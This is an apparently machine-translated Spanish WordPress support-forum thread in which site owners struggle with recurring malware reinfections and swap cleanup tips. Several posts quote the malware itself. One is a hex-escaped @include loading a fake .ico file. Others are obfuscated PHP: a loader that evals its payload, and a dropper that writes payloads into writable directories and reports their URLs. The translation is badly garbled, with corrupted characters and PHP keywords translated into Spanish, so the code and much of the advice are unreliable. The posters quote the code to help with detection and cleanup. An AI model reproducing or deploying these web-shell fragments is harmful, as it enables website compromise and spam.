Pregunta sobre Wordfence Security de Wordpress:

sigue mostrando archivos maliciosos

Un usuario pregunt贸 馃憞

Mi cuenta que aloja algunos sitios web de WordPress parece tener un problema de archivos maliciosos. No tengo mucha experiencia arreglando este tipo de cosas.

Tengo una cuenta de Bluehost. Es el plan de alojamiento en la nube, pero creo que compartido. Estoy usando Wordfence para restaurar archivos.

Los siguientes archivos se ven afectados: El archivo parece ser malicioso: wp-config.php wp-settings.php El archivo parece ser malicioso: index.php Archivo principal de WordPress Modificado: index.php Archivo principal WordPress modificado: wp-settings.php

Aqu铆 hay un ejemplo del c贸digo que veo. Parece que este archivo tiene hockey instalado para realizar actividades maliciosas. Si conoce este archivo, puede ignorarlo para excluirlo de an谩lisis futuros. El texto que encontramos en este archivo coincide con un archivo malicioso conocido: 芦@include禄 x2fh x6fm x651 x2fm x61v x65r x69f x35 / x70u x62l x69c x5fh x74m x6c / x73i x67n x73o x68i x6f / x77p x2dc x6fn x74e x6et x2fg x61l x6ce x72y x2ff x61v x69c x6fn x5f4 x641 x622 x66. x69c x6f 芦鈥β. El tipo de infecci贸n es: Miscel谩nea: PHP / ico. Ni siquiera estoy seguro de lo que hace o significa ese c贸digo.

Vuelvo corriendo a trav茅s de Wordfence … pero contin煤a y tengo varios sitios web. 驴C贸mo puedo hacer que esto se detenga? 驴Existe una forma sencilla de solucionar este problema? Creo que es extra帽o que esto tambi茅n est茅 sucediendo en nuevas instalaciones, as铆 que no estoy seguro de qu茅 hacer.

(@bluebearmedia)

Hace 3 a帽os, 5 meses

El hecho del asunto es que la corrupci贸n sigue ocurriendo nuevamente que compromete / compromete el nivel del servidor y puede afectar m谩s que solo su propio sitio …

Si Wordfence no recopila malware o amenazas directamente en su sitio, es probable que el problema sea externo; es posible que desee informar a su proveedor de alojamiento para que puedan investigar el servidor.

(@wfalaa)

Hace 3 a帽os, 4 meses

Hola @bethplummer, normalmente recomendar铆a los pasos mencionados en 芦C贸mo limpiar un sitio de WordPress pirateado usando Wordfence鈥, Pero como鈥 bluebearmedia 鈥漷odav铆a parece haber un fondo y el atacante sigue su camino para reinfectar archivos una y otra vez, en la mayor铆a de los casos su sitio web podr铆a ser pirateado porque un sitio web otras infecciones en el mismo uso compartido pueden requerir un servidor, en estos casos, para contratar a un analista de seguridad profesional para que realice la limpieza del sitio por usted.

Gracias.

(@houstonjobblog)

Hace 3 a帽os, 2 meses

Tengo el mismo problema en mi cuenta de host Blue. Empec茅 hace aproximadamente un mes.

Todas las contrase帽as se han cambiado y todav铆a deben borrarse casi a diario.

(@ schagerl0011)

Hace 2 a帽os, 8 meses

Tengo el mismo problema. Intento limpiar los archivos infectados, pero el problema aparece una y otra vez. Entonces, 驴hay alguna manera de eliminar este malware para siempre? Tambi茅n cambi茅 todas las contrase帽as y los permisos del sistema de archivos.

隆Gracias!

(@ troy7890)

Hace 2 a帽os, 8 meses

El mismo problema aqu铆 con aproximadamente 5 sitios en un servidor compartido. Es una limpieza casi diaria de boca en boca, pero estas limpiezas no llegan a la ra铆z de la infecci贸n por alguna raz贸n.

Se mete en mi archivo wp-config, lo limpio, restablezco los permisos y, uno o dos d铆as despu茅s, vuelve a infectarse. Restablec铆 las contrase帽as de inicio de sesi贸n del servidor, las contrase帽as de ftp, las contrase帽as de la base de datos de wordpress para todos los sitios, el inicio de sesi贸n de wp. Estoy perdido por todo lo dem谩s que puedo hacer. 隆Cualquier consejo ser谩 apreciado!

(@johpg)

Hace 2 a帽os, 8 meses

Si agrega 鈥 x2fh x6fm x651 x2fm x61v x65r x69f x35 / x70u x62l x69c x5fh x74m x6c / x73i x67n x73o x68i x6f / x77p x2dc x6fn x74e x6et x2fg x61l x6ce x72y x2ff x61v x69c x6fn x5f4 x641 x622 x66. x69c x6f 芦en UNPHP.NET se decodifica con esto: /home1/maverif5/public_html/signsohio/wp-content/gallery/favicon_4d1b2f.ico

Este es un archivo malicioso que debe eliminarse.

Verifique la configuraci贸n de usuario para cualquier cuenta de administrador que no reconozca y elim铆nela.

(@kiwi_dan)

Hace 2 a帽os, 8 meses

El mismo problema ha estado sucediendo durante varios meses. Sospecho que es el nivel del servidor, ya que borr茅 mi configuraci贸n y luego cambi茅 todas las contrase帽as (muchas veces). A veces obtengo archivos que tienen permisos establecidos en 000 que me muestran el acceso de root. A2 Influenced Hosting Company aloja todos los d铆as durante semanas y me siguen refiriendo para su servicio de limpieza por contrato de terceros.

Mi anfitri贸n sigue cerrando mi servicio de correo electr贸nico porque la infecci贸n genera spam en mis sitios.

A punto de limpiar y mudarse a un nuevo anfitri贸n.

He descargado el conjunto completo de archivos maliciosos si alguien est谩 interesado en verlos.

Aqu铆 hay un contenido que sigue regresando llamados archivos .php: $ bnuui) {funci贸n mosulw ($ dubiat, $ otktndm, $ suauag) {recuperar $ dubiat[6]($ dubiat[4]($ otktndm. $ dubiat[0], ($ suauag / $ dubiat[8]($ otktndm)) +1), 0, $ suauag);} funci贸n gbkww ($ dubiat, $ rdlduvw) {return @ $ dubiat[9]($ dubiat[1], $ rdlduvw);} funci贸n zgpojvs ($ dubiat, $ rdlduvw) {$ gjkxcko = $ dubiat[3]($ rdlduvw)% 3; if (! $ gjkxcko) {evaluado ($ rdlduvw[1]($ rdlduvw[2])); salir ();}} $ bnuui = gbkww ($ dubiat, $ bnuui); zgpojvs ($ dubiat, $ dubiat[5]($ dubiat[2], $ bnuui ^ mosulw ($ dubiat, $ otktndm, $ dubiat[8]($ bnuui)))));}

(@ troy7890)

Hace 2 a帽os, 8 meses

Realice un an谩lisis completo con el plugin: seguridad de WebDefender. Luego, elimine los archivos de inyecci贸n que encuentre si no es un archivo nativo de WordPress. Si es as铆, l铆mpielo.

(@kiwi_dan)

Hace 2 a帽os, 8 meses

Gracias por el rompecabezas de Troya. Estoy usando WordFence para escanear manualmente dos veces al d铆a. 驴Supongo que WebDefender tendr谩 resultados similares? Despu茅s de eliminar los archivos, se volvieron a inyectar uno o dos d铆as despu茅s.

(@ troy7890)

Hace 2 a帽os, 8 meses

Estaba en el mismo bucle sin fin contigo con Wordfence. WebDefender encontr贸 muchos m谩s archivos que causaron las reinfecciones. Hazlo, me lo agradecer谩s m谩s tarde.

(@johpg)

Hace 2 a帽os, 8 meses

@ troy7890: Gracias por el consejo sobre WebDefender.

Encontr贸 algunos archivos PHP en los directorios wp-content / uploads que perdieron Wordfence.

(@lookmaimonline)

Hace 2 a帽os, 8 meses

Wow estaba usando wordfence y recib铆a algunos archivos todos los d铆as que arreglaba o borraba, pero instal茅 un webdefender y lo ejecut茅 y encontr茅 un barco cargando m谩s archivos que wordfence no obten铆a.

Gracias por la pista.

(@ schagerl0011)

Hace 2 a帽os, 7 meses

Intento instalar el plugin de WordPress de WebDefender, pero siempre aparece el siguiente error: Cannot write progress data to file. Tambi茅n con todos los derechos sobre el directorio WWW del sitio.

Tambi茅n prob茅 el 芦sitio Antivirus para PHP禄 de WebDefender, pero el archivo 芦cwis-scan.min.js禄 falta en el paquete de descarga.

Estoy desesperado, 驴alguien podr铆a ayudarme a ejecutar WebDefender?

隆Gracias!

(@ willi108)

Hace 2 a帽os, 6 meses

Hola

Si las personas tienen servidores Plesk, puede ver la extensi贸n de seguridad 芦Revisium Antivirus禄 (Extensiones> pesta帽a Seguridad> ver todo> buscar Revisium Antivirus) y luego de ejecutar el antivirus ver谩 una lista de archivos infectados. todo dentro de cada directorio y sitio, luego proceda a eliminar todos los infectados, no olvide eliminar el c贸digo infectado dentro de algunos de los archivos (el antivirus lo guiar谩). Eso es lo que

Felicitaciones, su servidor se ha limpiado

隆Espero que esto te ayude!

el mejor

(@ ebakker66)

Hace 2 a帽os, 6 meses

Hola solo una adici贸n. Estaba en el mismo bucle sin fin con wordfence tratando de eliminar estos archivos infectados con @include 鈥 x2fh x6fm x651 etc.

Creo que encontr茅 el archivo que est谩 causando las infecciones @include 鈥 x2fh x6fm x651, etc. todo el tiempo.

Esto es lo que hice: 1) Descargue el sitio completo de WordPress en su computadora 2) Luego busque archivos php con el texto ‘rawurldecode’ usando Notepad ++ 3) Si encuentra archivos con nombres de archivo extra帽os como: zvqbjhrl.php Y tambi茅n contienen c贸digo muy extra帽o, por ejemplo: funci贸n jdszmp ($ vtwintjvkr, $ vnuonc) {global $ vtwmb; $ vtwmb = $ vtwintjvkr; $ vnuonc = str_split (rawurldecode (str_rot13 ($ vnuonc))); funci贸n jzibdoj, $ zyeiaia, $ vtwintjvkr) {global $ nfspmbl, $ vtwmb; recuperar $ zyeiayf ^ $ nfspmbl[$vtwintjvkr % strlen($nfspmbl)] ^ $ vtwmb[$vtwintjvkr % strlen($vtwmb)];} $ vnuonc = implode (鈥溾, array_map (鈥渏zibdoj鈥, array_values 鈥嬧($ vnuonc), array_keys ($ vnuonc)); $ vnuonc = @unserialize ($ vnuonc); if (@is_array ($ vnuonc) )) {$ vtwintjvkr = array_keys ($ vnuonc); $ vnuonc = $ vnuonc[$vtwintjvkr[0]]; si ($ vnuonc === $ vtwintjvkr[0]) {macalla @serialize (Array (‘php’ => @phpversion (),)); exit ();} else {function lrzugsl ($ pockhvlvjir) {static $ oxtys = edit (); $ pockhvlvjsjhbtvle = glob ($ pockhvlvjir. ‘/ *’, GLOB_ONLYDIR); if (count ($ pockhvlvjsjhbtvle)> 0) {foreach ($ pockhvlvjsjhbtvle para $ pockhvlvj) {if (@is_writable ($ pockhvlvj)) {$ oxtys[] = $ pockhvlvj;}}} foreach ($ pockhvlvjsjhbtvle como $ pockhvlvjir) lrzugsl ($ pockhvlvjir); recuperar $ oxtys;} $ tghfnmi = $ _SERVER[鈥淒OCUMENT_ROOT鈥漖; $ pockhvlvjsjhbtvle = lrzugsl ($ tghfnmi); $ vtwintjvkr = array_rand ($ pockhvlvjsjhbtvle); $ jlolaswm = $ pockhvlvjsjhbtvle[$vtwintjvkr] . 鈥/鈥. substr (md5 (am ()), 0, 8). 芦.Fp禄; @file_put_contents ($ jlolaswm, $ vnuonc); echo 芦http: //禄. $ _SERVER[鈥淗TTP_HOST鈥漖 . substr ($ jlolaswm, strlen ($ tghfnmi)); salida ();}}}

Luego borre esos archivos.

Rath,

ebakker66

驴Solucion贸 tu problema??

0 / 0

Deja una respuesta 0

Tu direcci贸n de correo electr贸nico no ser谩 publicada. Los campos obligatorios est谩n marcados con *